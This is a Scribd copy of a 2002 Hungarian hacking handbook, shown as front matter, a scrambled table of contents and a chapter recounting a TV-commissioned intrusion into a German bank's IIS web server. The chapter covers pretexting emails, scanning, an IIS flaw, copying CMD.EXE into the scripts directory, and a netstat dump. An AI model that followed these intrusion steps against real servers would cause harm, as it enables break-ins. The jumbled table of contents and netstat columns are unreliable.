P. 1
Thomas Vosseberg - Hacker kézikönyv (2002, 115 oldal)

Thomas Vosseberg - Hacker kézikönyv (2002, 115 oldal)

|Views: 2,951|Likes:
Published by balrobi

More info:

Published by: balrobi on Oct 07, 2010
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

10/02/2012

pdf

text

original

Thomas Vosseberg

Feltörés kontra védelem
Fontos figyelmeztetés!
A szerző a könyv teljes tényanyagát a legnagyobb gonddal dolgozta ki, illetve állította össze, és hatékony ellenőrzések mellett készítette. A hibák ennek ellenére sem zárhatók ki, ezért a kiadó és a szerző kénytelenek felhívni a figyelmet arra, hogy hibás közlésekre visszavezethető következményekért sem garanciát, sem jogi vagy bármilyen értelemben vett felelősséget vagy jótállást nem vállalnak. Az internetcímek vagy a verziószámok a szerkesztés lezártakor rendelkezésre álló állapotot tükrözik. A kiadó és a szerző semmilyen felelősséget vagy garanciát nem vállal a változásokért, amelyek tőlük függetlenül fellépő körülményekből adódnak. Az esetleg letöltésre kínált fájok és információk kizárólag nem üzleti felhasználásra szolgálnak. Üzleti felhasználás csak a licenctulajdonos beleegyezésével lehetséges. © 2002 Franzis1 Verlag GmbH, 85586 Poing © 2002 Computer Panoráma, 1091 Budapest, üllői út 25. Felelős kiadó: Dely Tamás ügyvezető igazgató Felelős szerkesztő: Horváth Annamária Fordította: Murányi Eszter Tervezőszerkesztő: Dancs Katalin Címlapterv: Szincsák László Minden jog fenntartva. Jelen könyvet, illetve annak részeit tilos reprodukálni, adatrendszerben tárolni, bármely formában vagy eszközzel - elektronikus, fényképészeti úton vagy más módon - a kiadó engedélye nélkül közölni. A kötetet készítette: Levilágítás: HVG Press Nyomtatás és kötés: Szegedi Kossuth Nyomda Kft. 6723 Szeged, Makkosházi krt. 1. Felelős vezető: Gera Imre ügyvezető igazgató
ISBN: 963 7639 225

Tartalom
1. A BANK-HACKELÉS 1.1 A feladat 1.1.1 Feltételek 1.1.2 A megoldáshoz vezető út 1.2 Hozzáférési út - információszerzés a Social Engineering módszerrel 1.3 A megfelelő cél keresése 1.3.1 Takarékpénztárak - túl sok szerverellenőrzés 1.3.2 Kutatás: IIS szerver kerestetik 1.3.3 Az operációs rendszer és a tranzakciós szoftver 1.3.4 Hogyan védik a szervert? 1.3.5 Nincsenek logfájlok - ezt biztosan az OFX irányítja 1.3.6 Adatátadás scriptekkel 1.3.7 Az adatletöltés 1.4 Utóirat a bank-hackeléshez 1.5 Összefoglalás 1.6 Sajtóbeszámolók 1.7 Tapasztalatok más bankoknál 1.7.1 Forgatókönyv a takarékpénztár-területen 2. A WINDOWS-RENDSZEREK (9X, NT, 2000) GYENGE PONTJAI 2.1 A hackeren túl - merevlemez-fejreállás, adatbetekintés vagy lopás 2.1.1 Különbségek a Windows 9x, az NT és utódai között 2.1.2 A fizikai támadás 2.1.3 Képernyővédő - jelszó - a bennfenteseknek nem okoz problémát 15 16 16 17 18 20 20 21 22 23 26 26 28 29 29 30 33 33 37 38 39 39 42

2.1.4 Automatikus lejátszás - a betörés előkészítése CD-vel
2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak

44
47 47

2.2.2 A jelszófájlok
2.2.3 Jelszavak a Windows 2000 alatt 2.3 A távoli elérésű támadás - internet- vagy hálózati felhasználók, vigyázat! 2.3.1 A fájl- és nyomtatómegosztás - veszélyes biztonsági rések 2.3.2 Mik azok a szkennerek, és hogyan működnek? 2.3.3 Milyen lehetőségeik vannak a betolakodóknak?

49
51 52 53 54 56

2.3.4 2.3.5

Jelszóval védett megosztások BruteForce-rohamok a megosztási jelszavak ellen

57 57
58 59

2.3.6 Óvintézkedések 2.4 További támadási technikák 3. ALAPOK

3.1 Az anonim Internetezés csökkenti a kockázatot 3.1.1 A legtöbb felhasználó sokat elárul 3.1.2 Névtelenül
3.2. A TCP/IP 3.2.1 Mi a TCP/IP?
3.2.2 Különböző protokollok a rétegekben 3.3 Néhány alkalmazás és protokoll használata és a biztonságosságuk 3.3.1 A Telnet

61 62 63 65
68 68
70 80 81

3.3.2 Az FTP 3.3.3. Az IRC
3.3.4 3.4 4. 4.1 4.2 4.2.1 Az IP-címzés Aportokról A TRÓJAIAK A történelmi minta Miből áll egy trójai? A szerver kiosztása

82 84
85 87 91 92 92 93

4.2.2 4.2.3 4.3 4.3.1 4.3.2 4.3.3 4.3.4 4.3.5 4.3.6 4.3.7 4.4 4.4.1 4.5 4.5.1 4.6 4.6.1 4.6.2 4.6.3 4.6.4

A kliens otthon marad, és vezérli a szervert Hogyan szerzik meg a hackerek az IP-t? így álcázzák és terjesztik a trójaiakat A trójaiakat fájlokba integrálják Álcázás a WinZip-pel. A trójaiakat az ICQ-val is tovább lehet adni Elég egy CD és az automatikus lejátszás funkció A lemezek majdnem ugyanígy működnek További terjesztési stratégiák Mit csinálnak a hobby-hackerek a trójaiakkal? Sub7 - egy trójai rémisztő lehetőségekkel Támad a Sub7 BackOrifice 2K - Hálózati eszköz vagy támadás a Microsoft ellen A BO2K és összetevői így ismerjük fel a trójait a rendszerünkben Vírus- és trójai-szkenner AutoRun bejegyzések Windows-Registry - ez már izgalmas Módszerek az Explorer.exe-vel a C:\ meghajtóra

94 95 96 96 97 98 99 100 100 101 102 103 105 106 107 107 108 109 112

4.6.5
5.

A runonce.exe kicserélése
VÍRUSOK - VESZÉLYES FÁJLOK

112
113
115 116 117 117 117 118 118 119 119 119 121 121 122 122 122 124 124 124 125 125

5.1 Alapok 5.1.1 Defektes cluster mint álcázás 5.1.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.1.3 Videokártyák - az elvetemült támadók búvóhelyei? 5.2 A vírus felépítése 5.3 Hogyan fertőz meg a vírus egy fájlt? 5.3.1 így fertőznek a bootszektor vírusok 5.3.2 A dropper vírust helyez el 5.4 A legfontosabb vírustípusok rövid áttekintése 5.4.1 Bootszektor vírusok 5.4.2 Companion vírusok 5.4.3 Killerprogramok 5.4.4 Logikai bombák 5.4.5 Makrovírusok 5.4.6 Hálózati vírusok 5.4.7 Polimorf vírusok 5.4.8 Stealth vagy rejtőzködő vírusok 5.4.9 A TSR fájlvírusok 5.4.10 Update vírusok 5.4.11 Férgek - az ILOVEYOU és társai

5.4.12 Időzítők
5.5 Word makrovírus írása 5.5.1 Minden ténykedés központja - a Normal.dot fájl 5.5.2 Modul vagy osztálymodul? 5.5.3 Vírusok kontra ServiceRelease 5.5.4 Modul makrók 5.5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg 5.5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.5.7 A vírus jelszóval védi a fájlt 5.6 Megfertőzött osztálymodulok

126
126 126 127 127 127 131 132 133 133

5.7

ILOVEYOU

137
138 138 140 140 149 149 150

5.7.1 Mi az a féreg? 5.7.2 A működési mód 5.7.3 Hogyan tudott a féreg elterjedni? 5.7.4 A forrás - kommentárokkal 5.8 Hogyan működnek a vírusvizsgálók? 5.8.1 Szkennermodul 5.8.2 Víruspajzs

1 7.2.2 Félig nyitott TCP-szkennelés 6.2 ICQ .2 Hogyan működik egy sniffer? 9.2.1 Mi az a sniffer? 9.3 7.1 Az ICQ .3 5.2.3 Astack (magyarul: halom/rakás) 11.2 7. SZKENNELÉS .4.1.3.1 Szkennelés teljes TCP-kapcsolattal 6.2 Out-of-Band csomagok .2.3 7. A szkenner 6.biztonsági kockázat? 8. SNIFFER 9.2.5.6 6.1 7.4.1 Az operációs rendszer memóriakezelése 11.1 Szöveg 11.2 Szkennelési eljárások 6.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők Ismert felhasználói nevek jelszavainak a kitalálása A beállítások egy áttekintésben Jelszavak megfejtése a John the Ripperrel Single Mode A szólista módszer Incremental mód Extemal mód A John legfontosabb parancsai 157 158 160 161 162 162 163 163 164 164 165 165 7.8.1 Az IP-spoofing mint előfeltétel 10.2.1.2.2.4 7.2 A Buffer-Overflow-támadások 11.2.5 6.4.1 E-mail-támadások 8.6 A jelszófájl 8. A DENIAL OF SERVICE TÁMADÁS 10.4 Mit lehet tenni a snifferek ellen? 10.túlcsordul a postafiók 8.1.1.1 7.8 DDoS . 7.1.4 Land támadások 10.3 A sniffer veszélyei 9.5 JELSZÓFELTÖRÉS Hackelt security-site .7 Smurf 10. TÁMADÁSOK AZ INTERNET-FELHASZNÁLÓK ELLEN 8.Distributed Denial of Service támadások 10.2 A fájlmelléklet kitömése 8.4.2.praktikus és veszélyes 8. BUFFER-OVERFLOW 11.6 Ping-Flodding 10.3 Large Packet-támadások avagy a Ping of Death 10.1 Hogyan lehet ezt kihasználni? 165 167 168 168 170 172 174 175 176 181 182 182 184 184 187 188 189 190 190 191 192 192 192 193 195 196 197 197 197 197 198 .1.9 Fragmentált szkennelés UDP-lCMP-Port-Unreachable szkennelés UDP-Recvfrom-And-Write szkennelés ICMP-echo-scanning/ping-szkennelés A nyitott portok csak a kezdetet jelentik A portszkennelés elleni védelem 154 154 154 155 155 155 152 7.8 6.2.4.2 7.2.8.2 Milyen biztonsági rések vannak? 9.3.3 A ConCon bug 8.9 Védelem a DoS-támadások ellen 11.3 TCP-FIN-Scan 6.5 TCP-Syn-Flooding 10.4.A RÉSEK KERESÉSE 151 152 153 153 153 6.1.2 7.2 Adatok 11.4 6.4 „Fertőtlenítő" A vírusvédő program kiválasztásának a szempontjai 150 150 6.4 7.1 Mailbombák .a „nuken" 10.7 6.

4 Jelszóval védett webterületek megtámadása 12.3 Áldozat a Buffer-Overflow-kért 11.3 BBS biztonság 12.1.2 Hogyan működik? 11.5.2.1 CGI-scriptek biztonságossága 12.2.a „script kidek" nemzeti sportja 12. TŰZFALAK 13.2.2 A tűzfalak kategóriái 13.2 Védelem 12.2 Desktop tűzfalak 13.1 A CGI további ismert gyenge pontjai 12.11.2.6 Hogyan védhetjük meg a webszervert? 225 226 227 229 13.4.3 Minek kell a Shellcode változónál állnia? 11.2 Hitelkártya fake-ek 12.1.5 Defacement .2 Látogatásszámláló résekkel .3 Tűzfal-koncepciók 13.count.5.1 Egy desktop tűzfal megtámadása 13.5 Milyen védelmi mechanizmusok vannak? 11.1.cgi 12.4 Honnan lehet felismerni a Buffer-Overflow-t? 11.4.1 Védelem 12.2 A Buffer-Overflow-k és a tűzfalak 199 202 208 209 211 212 212 12.1 A tűzfal biztonsági szempontból fontos összetevői 13.4 Hogyan ismeri fel a támadó a tűzfalat? 13.1.2 Védelem a desktop tűzfallal 231 232 233 234 235 236 237 239 240 .1 Összefüggés a CPU és a Buffer-Overflow között 11.1. BIZTONSÁG A WEBEN 213 214 217 221 221 222 224 12.1.1 A tűzfal feladatai 13.

... 28 Utóirat a bank-hackeléshez 29 Összefoglalás......... mennyire biztonságos manapság az online banki ügyintézés Németországban... ám mivel a potenciálisan fenyegető károk még most is jelentősek lehetnek.....30 Tapasztalatok más bankoknál.... Ezek közé tartoztak: « Egyeden ügyfelet sem érhet kár... • Mindennek észrevétlenül kellett történnie...2 A megoldáshoz vezető út............2 A megoldáshoz vezető út A dolog a következőképpen zajlott: 1... hogy egyetlen tranzakciót sem lehetett úgy manipulálni vagy hamisítani........1.....Tartalom A feladat............ezt biztosan az OFX irányítja ........................ Ki kellett kémlelni az adatokat............... hogy megakadályozza a hiányosság nyilvánosságra kerülését.. vannak-e lehetőségek betörni egy banki szerverbe? • Mennyire biztonságosak a tranzakciók..........1 A feladat 2001 júniusában érdekes feladatot kapott egy fiatal hacker-csoport: banki rendszereket és elektronikus kártyákat kellett tesztelniük.... s az ARD Technikai Tanácsadó műsor keretében kellett ellenőrizni.. ...33 1 A bank-hackelés Rövid ideig az érdeklődés középpontjába került egy különös támadás egy németországi bankszerver ellen.21 1.........23 1..jogi megfontolásokból ........1 Takarékpénztárak-túl sok szerverellenőrzés.......3 Az operációs rendszer és a tranzakciós szoftver 22 1.....29 Sajtóbeszámolók.......3.4 Hogyan védik a szervert?. Manipulálni kellett a tranzakciókat..1............... így a támadás ennek a könyvnek a megjelenésekor már nem ismételhető meg....információszerzés a Social Engineering módszerrel___18 A megfelelő cél keresése........2 Kutatás: IIS szerver kerestetik ....3......... ...1 Forgatókönyv a takarékpénztár-területen.5 Nincsenek logfájlok ..........1......... 1..... amelyről ebben a fejezetben írunk....16 1.... hogy az végrehajthatatlanná váljon..... adatokat lekérdezni. 26 1........17 Hozzáférési út .................20 1...1................... sem korlátozni a működésében...1......................... Ez azt jelentette..33 1......16 1. • Trójai elhelyezése a homebanking-ügyfeleknél.. fejezet . A biztonság kérdését kétféleképpen lehetett megközelíteni: « Mennyire védettek az ügyfelek adatai...6 Adatátadás scriptekkel......3.? 1....... átirányítani stb. 2..... a bank nevét a szerzők ... amelyeket a homebanking során végrehajtanak? Van-e lehetőség..1 Feltételek..................... Az érintett intézmény a „betörés" hatására ugyan változtatott online banking rendszerén...... Két lehetséges indítás jutott a csoport eszébe: • Az intézmény webszerverének a megtámadása..................3... manipulálni........7.. nehogy az érintett bank az adás sugárzása előtt ideiglenes intézkedéseket tegyen.... Meg kellett találni a hozzáférési utat az adatokhoz vagy a szerverhez....... 3. 4...3... 1.....20 1.. csak a bank jött ki rosszul az ügyből.......letakarták....... • A bank online rendszerét nem lehetett sem zavarni.3...........1 Feltételek A feladat természetesen bizonyos feltételekhez volt kötve..3. 26 1..... Be kellett törni a rendszerbe...... A támadás visszhangja a könyv szerzőjére nézve mindenképpen pozitív volt. és fel kellett deríteni a manipulációs lehetőségeket.7 Az adatletöltés............... és ezt követően a banki szerver megtámadása a ...

A plug-gateway. hogy valójában mennyire van biztonságban ennek az intézménynek a pénze. Intrusion Detection System is található. jelzi és vissza is veri a rendszer elleni támadásokat. és csak az exkluzíván az online banki rendszer elé kapcsolt pluggateway-en. mint nálunk. aki hallott egy másik bank webszerverét ért hackertámadásról. Ezt a mailt elküldték 10 nagy német pénzintézetnek. Végülis arra a döntésre jutottak. amelyeket nyugodtan fel lehet mutatni. át kell játszani nekik egy trójai vírust. Ez természetesen heves vitákat váltott ki. A plug-gateway tűzfala minden csomagot analizál. Más megoldást kellett tehát találni. A mailt úgy kellett megírni. Továbbá az . hiszen többnyire maga sem tud róla semmit. Több banknak e-mailt írtak. integrált tűzfallal. a szerzőket is meglepve." típusú szabványmail után. hogy semmilyen visszacsatolás nem lehetséges kívülről a külső rendszerre. Néhány terepkísérlet után azonban ez a lehetőség a hajánál előrángatottnak tűnt. Így az ügyfelek banki adatainak az átvitele az online banking oldal betöltésétől kezdve biztonságos és kódolt. hogy aligha lehetne végrehajtani a tulajdonképpeni tesztet.kikémlelt ügyféladatokkal. illetve védett-e az online banki szolgáltatása. installálni kell a trójait stb. és azt sem tudták. Azonban a saját ügyféltanácsadót kérdezgetni bankja szerverének részleteiről nem túl szerencsés. Az ÖN XY bankja. és az internetről jövő kapcsolattól fizikailag elválasztott kapcsolatot állít elő a webszerverhez úgy. Ráadásul egy ilyen indítást állandóan felügyelni is kell. és végezetül szenvtelenül megkérdezték. Természetesen egyik résztvevőnek sem volt pontos koncepciója. a pénze sehol sincs nagyobb biztonságban. enged át kéréseket. Éppen ezért hálózattech-nikailag jártasnak mutatták magunkat. nem utolsósorban a (német) Btk. hogy egyszer azért megpróbálkoznak vele. és csak a szűrőszabályok (csak HTTPS elérések engedélyezettek) teljesülése esetén továbbítja az online banki rendszer webszerverére. Körülbelül 5 nap és 9 „Aggodalomra semmi ok. hiszen a kikémlelés után várni kell az első homebanking tranzakcióra. vagy pedig gyanút fog. az alábbi mail érkezett. amely csak a 443-as portot (HTTPS-kódolású adatátvitel SSL-lel) bocsátja rendelkezésre. hogyan is védi a bank az online ügymenetet és az ügyfelek adatait. hogy a felépítése miatt ne tudjanak egy szabvány ügyfélszolgálati szöveggel válaszolni rá. majd a megfelelő pillanatban. A megfelelő lehetőséget tehát csak egy pénzintézet webszerverének a feltörése jelenthette. amelyek online portált működtetnek. lecsapni. §-aira való tekintettel. Először tehát információkat kellett gyűjteniük. S ha egy ilyen akció kitudódna. és 263. hiszen talán csak kisebb hiányosságokra bukkannak. 1. Az egyszerűbb természetesen a régi jó trójaihoz való visszanyúlás lett volna: néhány PC-t kikémlelni. amikor az ügyfél online intézi banki ügyeit. amely a Cisco router és a bank szervere között található.információszerzés a Social Engineering módszerrel Mindenekelőtt személyes kapcsolatokon keresztül próbáltak információkat szerezni a bankszerverről. Az infrastruktúra Az XY bank online banki rendszerének infrastruktúrája a következők szerint van kiépítve: Valamennyi online banking megkeresés egy Cisco routeren keresztül érkezik. Először tájékozódni kellett a banki struktúráról. amely naplózza. annak olyan sajtóviszhangja lenne.2 Hozzáférési út . Ügyfeleket kell találni. A Cisco router mögött még egy exkluzíván az XY bank számára installált. a következő feladatokat látja el: Az internetkapcsolat és a webszerverhez kapcsolódás fizikai szétválasztása: egy külső rendszertől induló kapcsolat felépítésénél átveszi a kapcsolatot. amelyben ügyfélnek adták ki magunkat. 202. és most tudni akarja a saját bankjáról. hogyan is néznek ki pontosan a banki rendszerek. 1.

szerver stb. 1. A hackeléshez tulajdonképpen csak egy Microsoft HS-szerver jöhetett szóba. Mivel a keresett formátumból tulajdonképpen nem sok volt. Miután ezekről a szerver-kliens szoftverekről csak szűkös információkat találtak. Ennek az oldalnak a szervere Schwerinben van. hogy minden egyes bankot megvizsgáltak. az online banki rendszer csak HTTPS-en keresztül (443. a következő cím alatt fut: https://ww2. így az adatbázist egyáltalán nem lehet közvetlenül elérni az internetről. Ez a szabvány az internetes tranzakcióknál biztonságos. operációs rendszer. Mint várható. és kezelik a további ügyfélinformációkat. Részletek a szerverekről . ám az onlinebanking egy számítógépközponton keresztül zajlik. Takarékpénztárak . mert például Hannoverben majdnem minden takarékpénztárat ÉszakNémetországból hostolnak. hogy minden bevitel egy log-fájlba vándoroljon. Az adminisztrátor 2001. nem sikerült. továbbra is tisztázatlan.3 A megfelelő cél keresése Az ötlet tehát az volt. és ott úgy változtatják meg a login-oldalakat.3. A kérdés csak az volt. A PIN-ek kódolva vannak tárolva az adatbázisban. később) eredményeként már világos volt: minden bank különböző pénzügyi szoftvereket használ. port) a 128 bites kódolású. amelynek a szervere közvetlenül csatlakozik az online banking-hez.adatbázis szerver fizikailag el van választva a webszervertől és az alkalmazástól. Itt van példának a www.1.cgi/Ostseespk_Rostock.de/cgi/anfang. hogy lássák a szervereiket. hóban maga hajtott végre szkennelést a nyitott internetfellépés és a bank online rendszere ellen. havi biztonsági analízise A rendszeradminisztrátor 2001. Ezek gondoskodnak a számlaszámok és a PIN-ek belépő ellenőrzéséről.finommunkák Ami a mail-bői nem derült ki.2 Kutatás: US-szerver kerestetik így tehát inkább a nagyobb bankokra kellett összpontosítani. 2. de a tulajdonképpeni oldal. Egy támadás itt egy kicsit melegnek tűnt. A kísérlet. például az OFX-et (Open Financial Exchange). hogy ugyan majdnem minden takarékszövetkezetnek van saját weboldala. azonban néhány szkennelés (közelebbit ld.hotnebanking-mecklenburgvorp. 06. A részletes információk szkennelése . hogy nincsenek-e esetleg kódolva ezek stb. Szkenneltek néhány bankot. melyik bank legyen az? 1. és ki lehetett indulni abból. hogy keresnek egy nagyobb bankot. világossá vált a számukra.ostspa.túl sok szerverellenőrzés A német takarékpénztárak az infrastruktúrára vetett rövid pillantás után kiestek. arra a módszerre amelynek révén részletes bepillantást nyerhettek a banki webszerver biztonsági intézkedéseibe.).3. 1. Hannoverben található. Az volt ugyanis a probléma velük. 3. és semmilyen visszacsatolást nem engednek meg a valójában felhasznált PIN-re. és már egy tesztcélú szkennelés is figyelmet keltene. hogy további információkat tudjunk meg a rendszerről (hardver. Biztonság Az infrastruktúra (hardver és rendszerszoftver szinten) megfelelő védettsége érdekében még a következő biztonsági intézkedéseket tettük az online banki ügyintézésnél: A kliens és a szerver közötti kapcsolat 128 bites maximális kódolással épül fel. biztonságos internet-eléréssel érhető el. miközben ez a szerver a DVG-nél. Még ha lehetséges is lenne adatokhoz jutni az OFX-adatbázisból. azzal kezdhettek. hogy az adminek „a gépen ülnek".06. Ez egy jól sikerült példa volt a Social Engineeringre.de. ahol az ügyfelek a számlájukhoz férnek. hogy csak egy bank login oldaláról juthatnak hozzá az ügyfelek adataihoz.

amelyen keresztül úgy a bank.3.3. mert e bank ügyfeleinek egész Németországban erről a portálról kellett bejelentkezniük. Tesztelni az exploitokát. mert egy végzetes rés a IIS-en. hogy sikerrel járnak. A bank minden szakembere az új projekten dolgozik. amely e bank mellett szólt. egy portált. Tivoli Management Software-rel karbantartva (amelynek a hibáiról lehetett már hallani)! De ezt ezen a szerveren nem ellenőrizték. és a még futó régi rendszert „elhanyagolják". 4. 3. A cél ismertetőjegyei .4 Hogyan védik a szervert? Úgy tűnt. 6. Kikutatni az adatátvitelt.az előkészítés feltételei A cél optimálisnak tűnt. amely a parancsok dekódolását érintette. Hitelesíteni. Feltérképezni az operációs rendszert és a tranzakciókhoz használt szoftvert.3 Az operációs rendszer és a tranzakciós szoftver Egy NT-webszerver IIS 4. (A szkennelés témájáról a 6. mert nem válaszolt a pingekre.0-val. 5. és kapcsolatokat sem engedett meg . 1. mint magáé a rendszeré. Utólagos becslések szerint az említett szám 5000 és 9000 között mozgott óránként. a ••• ügyfelei be tudtak login-olni. Ellenőrizni a védelmi mechanizmusokat. így a webszerver megtámadásának az időpontja több mint ideális.Itt láthatók az infók a felhasznált szerverekről A szkennelő program segítségével különböző bankportálokat vizsgáltak. 1. úgy az oldalé. Egy további érv. így az oldal elérési számainak is magasnak kellett lenniük. mint egy leányvállalat. hogy megtalálják a betörésre alkalmas rendszert. Tehát abból indulhattak ki. lehetséges. hogy vannak-e logfájlok információkkal. A program szállította a legfontosabb információkat az egyes bankok és takarékpénztárak webszer-vereiről.) Napokig tartó szkennelés után találták meg a ••• oldalt. tökéletesen elegendő volt. a szerver tervezett átépítése volt. 2. A támadáshoz a következő lépéseket kellett végrehajtani: 1. fejezetben részletesen is olvashatnak. a szervert tűzfal védi. Ellenőrizni.

209.0.0.0.0.0.0:0 0.1:1028 127.1:1031 1 72.0.0.0:0 0. Helyi címek TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.0.xx:443 193.xx:443 Távoli címek 62.0:3128 0.27.0.24.0:3125 0.153.0.0.0:0 0.130.4.0:161 0.0.0:0 0.0:0 0.0:512 0.0.0:0 0.0.0:3489 0.1:1026 127.0.0:4796 0.0:0 172.213:1240 Állapot TIME_WAIT . és azt sem lehetett megmondani. TCP Helyi címek 193.0:0 0. 133. A szkennelések során nem derült ki pontosan.5:1435 172.0.0.46.27.0.27.0.209.0.0. mert a netstat-jelentés 4:00 óra körül kapcsolatokat mutatott a 4966/4967 portra.xx:80 193.xx:80 193.213:1237 62.0:0 0.4:80 172.158.xx:443 193.0.130.4:1557 212.0.xx:139 193.209.209.213:1182 62.0.0.0:2867 0. 152.157.24.0.0.0.144:1073 217.0.130.24.209.0.xx:80 193.0:0 0.0.0.0.1:1025 127.0.158.130.xx6.xx:138 193.158. de ezt kizárni sem lehetett.0.0.0:0 0.0. 152.0.145.130.27.0.xx:80 193.0. hogy a webszolgáltatón (80.158.5:1435 172.211:4233 62.130.0:0 0.158.213:1236 62.0:0 62.0.0.0.0.0:0 62.158.209.236:57480 193.0.xx:80 193.0.2.209.0:0 0.0.133:4233 0.153.xx:443 193.0:3697 0.130.0:0 0.1:1025 127.0.0.158.0.xx: 1029 172.0.0.3:1036 62.0.0.xx:443 193.0. 209.0.158. port) és a HTTPS-en (443.0.0.0.166.0.209.0.0:0 0.0.158.0.153.0. intranet kapcsolatból indulhattak ki. 152.0.209.158.0. xx:443 193.0.0.0:135 0.0:0 0.0:1037 0.0.0:0 0. 152.0.24.4:80 172.1 58.0.0.158. milyen tűzfalról volt szó.213:1233 62.0.153.197.24.0.209.27.0.0:0 0.xx:80 193.xx:443 193.158.0:0 Állapot LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED LISTENING LISTENING ESTABLISHED LISTENING LISTENING LISTENING LISTENING ESTABLISHED TIME_WAIT ESTABLISHED TIME_WAIT TIME_WAIT LISTENING TIME_WAIT TIME_WAIT ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED LISTENING LISTENING LISTENING LISTENING CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TC P TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.158.0.xx:80 193.46.0:135 0.158.0.0.27. Mivel a távoli számítógépet egy komputernévvel jelölték.209.0. 209.0.158.xx:443 Távoli címek 0.211:4232 62.xx6.209.0:0 127.0.xx: 137 172.197.213:1235 62.0. 152.0.158. xx:3038 1 72.0.209.0:0 0.0.24.0.0:3038 0.xx:137 193.xx:31 11 172.0.0.1 52.158.206.152. port) kívül más portok elérése is megengedett-e.0:2874 0.0:1027 0.0.153.0.0.0.130.xx:80 193.61:1119 212.0.0:0 127.0:0 0.0:0 0.24.0.0.0:0 0. Íme a netstat-jelentés: Prot.xx:443 193.0.0.0. 152.0.0:0 0.166.0.xx: 139 1 72.0.xx:3127 193.1:1031 0.0.xx:138 1 72.209.0.0.213:1234 62.209.0.0:1031 0.0:4487 0.0.209.24.0:0 0.24.191:1042 212.0.0.101.0.0:2882 0.xx:80 193.0:0 0.24.0:3168 0.0.152.1 58.0:5044 127.0. 158.0.24.0:0 0.0.158.209.197.0.kifelé.0.0:3111 0.27.158.0.0:3037 0.5:1435 0.0:0 0.27.0:0 0.0.1:1025 0.24.0.0.0.0. xx:3125 172.0.24.213:1238 Prot.xx:3126 172.24.209.209.158.27.xx:80 193.209.

158.27.158. A parancsfordító CMD.xx:137 193.3. sem máshol.158.19.130.xx:3128 209.209.xx:443 193.xx:138 193.209.153.1 58.xx:443 193.213:1243 62. hanem JAVA scripteket használnak .158. Ebből továbbra is arra következtettek.xx:3121 193.209.209. xx:1277 193.158.xx:443 193.3:1044 62.xx:443 *:* *:* *:* *:* *:* *:* *:* TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT ESTABLISHED CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT CLOSING TIME_WAIT ESTABLISHED CLOSING LISTENING ESTABLISHED *:* 1.xx: 1202 0. a PIN és a felhasználó által megadott TAN az OFX-hez továbbítódik.158. 209.153.3:1038 62.24.209.158.19.1 58.209.209.54.158.209. Előkészületek (hozzáférés megszerzése) A megfelelő URL megadásával elérték a hozzáférést.xx:443 193.59.1 58.130.56.213:1245 62.24.5 Nincsenek logfájlok ezt biztosan az OFX irányítja IIS logfájlokat egyáltalán nem találtak.xx:443 193. hogyan is fogadja és továbbítja a rendszer az adatokat bejelentkezéskor.209.xx:443 193.213:1244 62.27.27.56.xx:137 172.158. 1.11. 209.xx:443 193.158. 209.3.0:0 193. és ezt éri el.3:1043 62. amelyek azonban nem adtak információt a kapcsolatokról.130.209.209.158. amely aztán visszaadja a hibakódokat.158.xx:443 1 93.158.27.0.27.165.158.209.xx: 11 94 62. 152.213:1241 62.19.152.0:161 172.209. 209.24. és ott hasonlítják össze.19. hogy működőképesen legyen kezelhető a . Feltételezték.209. Találtak viszont OFX-szoftver-jelentéseket.0:135 0.27. milyen módon lehetne megtámadni a szervert. sem adatbázis-jelszavakat vagy hasonlókat nem találtak.130.xx:443 193.209.xx:2326 63.130. 209.xx6.xx:3128 0.xx:138 1 72.158.xx:443 193.27.158.213:1247 62. 152.158. hogy vagy a tűzfal log-okat értékelik ki.EXE-t a webszerver rendszerkönyvtárából a script-könyvtárba másolták. sem a C:\WINNT\ system32\LogFiles könyvtárban.27. vagy teljesen lemondanak a loggolásról! Az OFX-ről A szerveren sem folyószámla-adatokat.158.0.xx:443 193. hogy ezeket központilag tárolják egy számítógépen.xx6.xx:1182 62.209.24.130.xx:443 193.24.3:1039 62.xx6.209.xx:443 193.158.3:1042 62.xx:443 193.xx6.xx6.0.xx:443 193. és az adatokat nem lokálisan ellenőrzik.27.xx:443 193.amelyek szokatlan módon nem VB scripteket.1 58.0.3:1037 62.209.xx6.xx6.209.0.153.209.vezérlik. 154. xx:443 193.xx: 1029 193.209.27.209.xx6.xx: 1030 193.152.0. Természetesen pontosan megnézték.209.xx:443 193.3:1041 62.xx:1184 62.27.209.TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP DP UDP UDP UDP UDP UDP 193.209.xx:443 193. Az OFX-et az ASP-oldalakról .209.158.27.158.xx:1186 62.xx:443 193.158.xx:1185 62.6 Adatátadás scriptekkel A szkennelés után világos lett.158.152.213:1246 62.213:1242 62.153. illetve kezeli az OFX szoftver.158.130.27.xx:443 193.1 58.xx:443 193. xx:443 193. a felhasználói adatokat egy adatbázisba küldik.xx:1030 62.xx:443 193.27.xx:443 193.27.xx6. Tehát a tranzakcióknál a tranzakciók számai.3:1040 62.1 58.158.

